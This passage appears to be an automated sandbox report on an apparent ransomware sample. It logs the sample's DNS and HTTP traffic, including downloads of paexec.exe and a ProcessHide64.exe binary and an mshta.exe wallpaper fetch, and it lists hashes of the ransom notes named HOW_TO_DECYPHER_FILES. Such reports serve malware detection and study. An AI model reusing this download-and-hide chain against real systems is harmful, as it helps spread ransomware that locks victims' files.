                                                                                                                                                                          DNS
                                                                                                                                                                          www.poweradmin.com
                                                                                                                                                                          c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          www.poweradmin.com
                                                                                                                                                                          IN A
                                                                                                                                                                          Response
                                                                                                                                                                          www.poweradmin.com
                                                                                                                                                                          IN CNAME
                                                                                                                                                                          poweradmin.com
                                                                                                                                                                          poweradmin.com
                                                                                                                                                                          IN A
                                                                                                                                                                          52.1.55.52
                                                                                                                                                                        • flag-us
                                                                                                                                                                          GET
                                                                                                                                                                          https://www.poweradmin.com/paexec/paexec.exe
                                                                                                                                                                          c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                          Remote address:
                                                                                                                                                                          52.1.55.52:443
                                                                                                                                                                          Request
                                                                                                                                                                          GET /paexec/paexec.exe HTTP/1.1
                                                                                                                                                                          Host: www.poweradmin.com
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Response
                                                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                                                          Cache-Control: private
                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                          Last-Modified: Thu, 15 Apr 2021 21:21:55 GMT
                                                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                                                          X-AspNet-Version: 4.0.30319
                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                          Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: *.typekit.net *.poweradmin.com *.visualwebsiteoptimizer.com *.sitesearch360.com *.google.com *.googleadservices.com *.google-analytics.com *.googleusercontent.com *.googletagmanager.com *.googleapis.com *.gstatic.com *.doubleclick.net *.livechatinc.com *.authorize.net *.reddit.com *.redditstatic.com *.youtube.com *.capterra.com *.bing.com; frame-ancestors 'self' *.poweradmin.com *.authorize.net;
                                                                                                                                                                          X-Xss-Protection: 1;
                                                                                                                                                                          Date: Sun, 30 Jun 2024 11:04:44 GMT
                                                                                                                                                                          Content-Length: 224560
                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
                                                                                                                                                                          13.86.106.20.in-addr.arpa
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          13.86.106.20.in-addr.arpa
                                                                                                                                                                          IN PTR
                                                                                                                                                                          Response
                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
                                                                                                                                                                          196.187.250.142.in-addr.arpa
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          196.187.250.142.in-addr.arpa
                                                                                                                                                                          IN PTR
                                                                                                                                                                          Response
                                                                                                                                                                          196.187.250.142.in-addr.arpa
                                                                                                                                                                          IN PTR
                                                                                                                                                                          lhr25s33-in-f41e100net
                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
                                                                                                                                                                          52.55.1.52.in-addr.arpa
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          52.55.1.52.in-addr.arpa
                                                                                                                                                                          IN PTR
                                                                                                                                                                          Response
                                                                                                                                                                          52.55.1.52.in-addr.arpa
                                                                                                                                                                          IN PTR
                                                                                                                                                                          ec2-52-1-55-52 compute-1 amazonawscom
                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
                                                                                                                                                                          240.221.184.93.in-addr.arpa
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          240.221.184.93.in-addr.arpa
                                                                                                                                                                          IN PTR
                                                                                                                                                                          Response
                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
                                                                                                                                                                          73.31.126.40.in-addr.arpa
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          73.31.126.40.in-addr.arpa
                                                                                                                                                                          IN PTR
                                                                                                                                                                          Response
                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
                                                                                                                                                                          58.55.71.13.in-addr.arpa
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          58.55.71.13.in-addr.arpa
                                                                                                                                                                          IN PTR
                                                                                                                                                                          Response
                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
                                                                                                                                                                          255.0.127.10.in-addr.arpa
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          255.0.127.10.in-addr.arpa
                                                                                                                                                                          IN PTR
                                                                                                                                                                          Response
                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
                                                                                                                                                                          255.0.127.10.in-addr.arpa
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          255.0.127.10.in-addr.arpa
                                                                                                                                                                          IN PTR
                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
                                                                                                                                                                          cutewallpaper.org
                                                                                                                                                                          mshta.exe
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          cutewallpaper.org
                                                                                                                                                                          IN A
                                                                                                                                                                          Response
                                                                                                                                                                          cutewallpaper.org
                                                                                                                                                                          IN A
                                                                                                                                                                          172.67.211.67
                                                                                                                                                                          cutewallpaper.org
                                                                                                                                                                          IN A
                                                                                                                                                                          104.21.37.179
                                                                                                                                                                        • flag-us
                                                                                                                                                                          GET
                                                                                                                                                                          https://cutewallpaper.org/21/skull-wallpaper-free/Skull-Wallpaper-3D-Wallpapers-Latest.jpg
                                                                                                                                                                          mshta.exe
                                                                                                                                                                          Remote address:
                                                                                                                                                                          172.67.211.67:443
                                                                                                                                                                          Request
                                                                                                                                                                          GET /21/skull-wallpaper-free/Skull-Wallpaper-3D-Wallpapers-Latest.jpg HTTP/1.1
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                          Host: cutewallpaper.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Response
                                                                                                                                                                          HTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Sun, 30 Jun 2024 11:04:48 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          CDN-PullZone: 2200815
                                                                                                                                                                          CDN-Uid: 30062147-3877-4bcb-8666-933136e5ed15
                                                                                                                                                                          CDN-RequestCountryCode: FR
                                                                                                                                                                          Cache-Control: public, max-age=3600
                                                                                                                                                                          CDN-StorageServer: DE-383
                                                                                                                                                                          CDN-ProxyVer: 1.04
                                                                                                                                                                          CDN-RequestPullSuccess: True
                                                                                                                                                                          CDN-RequestPullCode: 404
                                                                                                                                                                          CDN-CachedAt: 06/30/2024 11:04:48
                                                                                                                                                                          CDN-EdgeStorageId: 1072
                                                                                                                                                                          CDN-Status: 404
                                                                                                                                                                          CDN-RequestId: d6858bcc027bf29ce2efab727dd5f2d2
                                                                                                                                                                          CDN-Cache: EXPIRED
                                                                                                                                                                          CF-Cache-Status: EXPIRED
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=boNMYSmpjRkLeN50GHvvB57IHocF9%2B3jJi11wVYQIFJ2pvXKZb7aFtDC4ijwlMRkJx%2FCiUuW4plaNisrKresfdXPng6RL1tt45xcOscHNo3svU4wBeJJI6I1Gpuaz%2FHkQd1NJw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 89bdad786f25531a-LHR
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
                                                                                                                                                                          c.pki.goog
                                                                                                                                                                          mshta.exe
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          c.pki.goog
                                                                                                                                                                          IN A
                                                                                                                                                                          Response
                                                                                                                                                                          c.pki.goog
                                                                                                                                                                          IN CNAME
                                                                                                                                                                          pki-goog.l.google.com
                                                                                                                                                                          pki-goog.l.google.com
                                                                                                                                                                          IN A
                                                                                                                                                                          172.217.169.67
                                                                                                                                                                        • flag-gb
                                                                                                                                                                          GET
                                                                                                                                                                          http://c.pki.goog/r/gsr1.crl
                                                                                                                                                                          mshta.exe
                                                                                                                                                                          Remote address:
                                                                                                                                                                          172.217.169.67:80
                                                                                                                                                                          Request
                                                                                                                                                                          GET /r/gsr1.crl HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          User-Agent: Microsoft-CryptoAPI/10.0
                                                                                                                                                                          Host: c.pki.goog
                                                                                                                                                                          Response
                                                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                                                                                                                                                          Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                                                                                                                                                          Content-Length: 1739
                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                          Server: sffe
                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                          Date: Sun, 30 Jun 2024 10:59:40 GMT
                                                                                                                                                                          Expires: Sun, 30 Jun 2024 11:49:40 GMT
                                                                                                                                                                          Cache-Control: public, max-age=3000
                                                                                                                                                                          Age: 308
                                                                                                                                                                          Last-Modified: Mon, 08 Apr 2024 07:48:00 GMT
                                                                                                                                                                          Content-Type: application/pkix-crl
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                        • flag-gb
                                                                                                                                                                          GET
                                                                                                                                                                          http://c.pki.goog/r/r4.crl
                                                                                                                                                                          mshta.exe
                                                                                                                                                                          Remote address:
                                                                                                                                                                          172.217.169.67:80
                                                                                                                                                                          Request
                                                                                                                                                                          GET /r/r4.crl HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          User-Agent: Microsoft-CryptoAPI/10.0
                                                                                                                                                                          Host: c.pki.goog
                                                                                                                                                                          Response
                                                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                                                                                                                                                          Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                                                                                                                                                          Content-Length: 436
                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                          Server: sffe
                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                          Date: Sun, 30 Jun 2024 10:59:40 GMT
                                                                                                                                                                          Expires: Sun, 30 Jun 2024 11:49:40 GMT
                                                                                                                                                                          Cache-Control: public, max-age=3000
                                                                                                                                                                          Age: 308
                                                                                                                                                                          Last-Modified: Wed, 01 Nov 2023 07:48:00 GMT
                                                                                                                                                                          Content-Type: application/pkix-crl
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
                                                                                                                                                                          67.211.67.172.in-addr.arpa
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          67.211.67.172.in-addr.arpa
                                                                                                                                                                          IN PTR
                                                                                                                                                                          Response
                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
                                                                                                                                                                          67.169.217.172.in-addr.arpa
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          67.169.217.172.in-addr.arpa
                                                                                                                                                                          IN PTR
                                                                                                                                                                          Response
                                                                                                                                                                          67.169.217.172.in-addr.arpa
                                                                                                                                                                          IN PTR
                                                                                                                                                                          lhr48s09-in-f31e100net
                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
                                                                                                                                                                          209.205.72.20.in-addr.arpa
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          209.205.72.20.in-addr.arpa
                                                                                                                                                                          IN PTR
                                                                                                                                                                          Response
                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
                                                                                                                                                                          103.169.127.40.in-addr.arpa
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          103.169.127.40.in-addr.arpa
                                                                                                                                                                          IN PTR
                                                                                                                                                                          Response
                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
                                                                                                                                                                          171.39.242.20.in-addr.arpa
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          171.39.242.20.in-addr.arpa
                                                                                                                                                                          IN PTR
                                                                                                                                                                          Response
                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
                                                                                                                                                                          107.12.20.2.in-addr.arpa
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          107.12.20.2.in-addr.arpa
                                                                                                                                                                          IN PTR
                                                                                                                                                                          Response
                                                                                                                                                                          107.12.20.2.in-addr.arpa
                                                                                                                                                                          IN PTR
                                                                                                                                                                          a2-20-12-107deploystaticakamaitechnologiescom
                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
                                                                                                                                                                          29.243.111.52.in-addr.arpa
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          29.243.111.52.in-addr.arpa
                                                                                                                                                                          IN PTR
                                                                                                                                                                          Response
                                                                                                                                                                        • 185.199.109.133:443
                                                                                                                                                                          https://raw.githubusercontent.com/d35ha/ProcessHide/master/bins/ProcessHide64.exe
                                                                                                                                                                          tls, http
                                                                                                                                                                          c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                          3.2kB
                                                                                                                                                                          152.3kB
                                                                                                                                                                          61
                                                                                                                                                                          115

                                                                                                                                                                          HTTP Request

                                                                                                                                                                          GET https://raw.githubusercontent.com/d35ha/ProcessHide/master/bins/ProcessHide64.exe

                                                                                                                                                                          HTTP Response

                                                                                                                                                                          200
                                                                                                                                                                        • 142.250.187.196:443
                                                                                                                                                                          https://www.google.com/
                                                                                                                                                                          tls, http
                                                                                                                                                                          c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                          1.6kB
                                                                                                                                                                          61.8kB
                                                                                                                                                                          28
                                                                                                                                                                          48

                                                                                                                                                                          HTTP Request

                                                                                                                                                                          GET https://www.google.com/

                                                                                                                                                                          HTTP Response

                                                                                                                                                                          200
                                                                                                                                                                        • 52.1.55.52:443
                                                                                                                                                                          https://www.poweradmin.com/paexec/paexec.exe
                                                                                                                                                                          tls, http
                                                                                                                                                                          c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                          5.1kB
                                                                                                                                                                          235.9kB
                                                                                                                                                                          100
                                                                                                                                                                          172

                                                                                                                                                                          HTTP Request

                                                                                                                                                                          GET https://www.poweradmin.com/paexec/paexec.exe

                                                                                                                                                                          HTTP Response

                                                                                                                                                                          200
                                                                                                                                                                        • 172.67.211.67:443
                                                                                                                                                                          https://cutewallpaper.org/21/skull-wallpaper-free/Skull-Wallpaper-3D-Wallpapers-Latest.jpg
                                                                                                                                                                          tls, http
                                                                                                                                                                          mshta.exe
                                                                                                                                                                          1.4kB
                                                                                                                                                                          5.3kB
                                                                                                                                                                          15
                                                                                                                                                                          12

                                                                                                                                                                          HTTP Request

                                                                                                                                                                          GET https://cutewallpaper.org/21/skull-wallpaper-free/Skull-Wallpaper-3D-Wallpapers-Latest.jpg

                                                                                                                                                                          HTTP Response

                                                                                                                                                                          404
                                                                                                                                                                        • 172.217.169.67:80
                                                                                                                                                                          http://c.pki.goog/r/r4.crl
                                                                                                                                                                          http
                                                                                                                                                                          mshta.exe
                                                                                                                                                                          602 B
                                                                                                                                                                          3.9kB
                                                                                                                                                                          8
                                                                                                                                                                          6

                                                                                                                                                                          HTTP Request

                                                                                                                                                                          GET http://c.pki.goog/r/gsr1.crl

                                                                                                                                                                          HTTP Response

                                                                                                                                                                          200

                                                                                                                                                                          HTTP Request

                                                                                                                                                                          GET http://c.pki.goog/r/r4.crl

                                                                                                                                                                          HTTP Response

                                                                                                                                                                          200
                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                          dns
                                                                                                                                                                          c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                          71 B
                                                                                                                                                                          135 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          raw.githubusercontent.com

                                                                                                                                                                          DNS Response

                                                                                                                                                                          185.199.109.133
                                                                                                                                                                          185.199.108.133
                                                                                                                                                                          185.199.111.133
                                                                                                                                                                          185.199.110.133

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          133.109.199.185.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          74 B
                                                                                                                                                                          118 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          133.109.199.185.in-addr.arpa

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          www.google.com
                                                                                                                                                                          dns
                                                                                                                                                                          c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                          60 B
                                                                                                                                                                          76 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          www.google.com

                                                                                                                                                                          DNS Response

                                                                                                                                                                          142.250.187.196

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          www.poweradmin.com
                                                                                                                                                                          dns
                                                                                                                                                                          c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                          64 B
                                                                                                                                                                          94 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          www.poweradmin.com

                                                                                                                                                                          DNS Response

                                                                                                                                                                          52.1.55.52

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          13.86.106.20.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          71 B
                                                                                                                                                                          157 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          13.86.106.20.in-addr.arpa

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          196.187.250.142.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          74 B
                                                                                                                                                                          112 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          196.187.250.142.in-addr.arpa

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          52.55.1.52.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          69 B
                                                                                                                                                                          121 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          52.55.1.52.in-addr.arpa

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          240.221.184.93.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          73 B
                                                                                                                                                                          144 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          240.221.184.93.in-addr.arpa

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          73.31.126.40.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          71 B
                                                                                                                                                                          157 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          73.31.126.40.in-addr.arpa

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          58.55.71.13.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          70 B
                                                                                                                                                                          144 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          58.55.71.13.in-addr.arpa

                                                                                                                                                                        • 10.127.255.255:3
                                                                                                                                                                          c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                          130 B
                                                                                                                                                                          1
                                                                                                                                                                        • 10.127.0.255:3
                                                                                                                                                                          c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                          130 B
                                                                                                                                                                          1
                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          255.0.127.10.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          142 B
                                                                                                                                                                          71 B
                                                                                                                                                                          2
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          255.0.127.10.in-addr.arpa

                                                                                                                                                                          DNS Request

                                                                                                                                                                          255.0.127.10.in-addr.arpa

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          cutewallpaper.org
                                                                                                                                                                          dns
                                                                                                                                                                          mshta.exe
                                                                                                                                                                          63 B
                                                                                                                                                                          95 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          cutewallpaper.org

                                                                                                                                                                          DNS Response

                                                                                                                                                                          172.67.211.67
                                                                                                                                                                          104.21.37.179

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          c.pki.goog
                                                                                                                                                                          dns
                                                                                                                                                                          mshta.exe
                                                                                                                                                                          56 B
                                                                                                                                                                          107 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          c.pki.goog

                                                                                                                                                                          DNS Response

                                                                                                                                                                          172.217.169.67

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          67.211.67.172.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          72 B
                                                                                                                                                                          134 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          67.211.67.172.in-addr.arpa

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          67.169.217.172.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          73 B
                                                                                                                                                                          111 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          67.169.217.172.in-addr.arpa

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          209.205.72.20.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          72 B
                                                                                                                                                                          158 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          209.205.72.20.in-addr.arpa

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          103.169.127.40.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          73 B
                                                                                                                                                                          147 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          103.169.127.40.in-addr.arpa

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          171.39.242.20.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          72 B
                                                                                                                                                                          158 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          171.39.242.20.in-addr.arpa

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          107.12.20.2.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          70 B
                                                                                                                                                                          133 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          107.12.20.2.in-addr.arpa

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          29.243.111.52.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          72 B
                                                                                                                                                                          158 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          29.243.111.52.in-addr.arpa

                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                        Replay Monitor

                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                        Downloads

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pqecgi20.v2j.ps1

                                                                                                                                                                          Filesize

                                                                                                                                                                          60B

                                                                                                                                                                          MD5

                                                                                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                          SHA1

                                                                                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                          SHA256

                                                                                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                          SHA512

                                                                                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jv2uowbm.exe

                                                                                                                                                                          Filesize

                                                                                                                                                                          219KB

                                                                                                                                                                          MD5

                                                                                                                                                                          b1dfb4f9eb3e598d1892a3bd3a92f079

                                                                                                                                                                          SHA1

                                                                                                                                                                          0fc135b131d0bb47c9a0aaf02490701303b76d3b

                                                                                                                                                                          SHA256

                                                                                                                                                                          ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb

                                                                                                                                                                          SHA512

                                                                                                                                                                          98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2

                                                                                                                                                                        • C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

                                                                                                                                                                          Filesize

                                                                                                                                                                          1KB

                                                                                                                                                                          MD5

                                                                                                                                                                          14e76cd699ec767f3f5b0b8d49e85ebb

                                                                                                                                                                          SHA1

                                                                                                                                                                          39fc2e05450a08dcd575dec6d245790c2a30fbfe

                                                                                                                                                                          SHA256

                                                                                                                                                                          4f4907c570b70e05fff683b2e5ef653d9672aa86bf962c68f0e45e1469788429

                                                                                                                                                                          SHA512

                                                                                                                                                                          4ef670d0f2f2fd2c4bb498ecf7f79cdd9bf3f0978f5b01f6b2533c4d2d146c5f4b461eae853a17b33c7f66487a198284fa0b8103327eefe46666cc709ab0a4a1

                                                                                                                                                                        • C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

                                                                                                                                                                          Filesize

                                                                                                                                                                          446B

                                                                                                                                                                          MD5

                                                                                                                                                                          13c9b06f677e12c6951b281b98f7ae0a

                                                                                                                                                                          SHA1

                                                                                                                                                                          d52667a5f3343706b7e1cb0df1ed942746dbcc6a

                                                                                                                                                                          SHA256

                                                                                                                                                                          12044f9fc36ca7cd4728f251003e5d832077c9d3a5bad61f131c67029bb4fd94

                                                                                                                                                                          SHA512

                                                                                                                                                                          c8f846a48db852a212c14ef0a6740d247b478c80374c3175d9bff2a3395f6811e7b96d4c672ae9a1de88be18ac67d3d89cafe4f98622f36d616198b1511d9b8b

                                                                                                                                                                        • memory/4192-1-0x00007FFAE60C3000-0x00007FFAE60C5000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          8KB

                                                                                                                                                                        • memory/4192-0-0x0000000000140000-0x000000000015C000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          112KB

                                                                                                                                                                        • memory/4192-134-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          10.8MB

                                                                                                                                                                        • memory/4192-2-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          10.8MB

